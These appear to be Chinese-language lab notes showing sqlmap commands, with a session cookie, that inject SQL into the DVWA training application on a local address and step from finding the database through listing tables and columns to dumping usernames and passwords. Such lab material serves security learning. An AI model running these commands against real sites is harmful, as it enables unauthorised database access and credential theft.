|
- 获取当前数据库
```
sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --current-db
```
得知数据库名为dvwa
![image-20231205181614677](image/image-20231205181614677.png)
- 获取当前数据库下的表
```
sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --D dvwa --tables
```
![image-20231205181636230](image/image-20231205181636230.png)
- 获取指定表的字段信息
```
python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D "dvwa" -T "users" --columns
```
![image-20231205181720063](image/image-20231205181720063.png)
- dump表中指定字段的数据
```
python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C "user,password" --dump
```
![image-20231205181823016](image/image-20231205181823016.png) |
|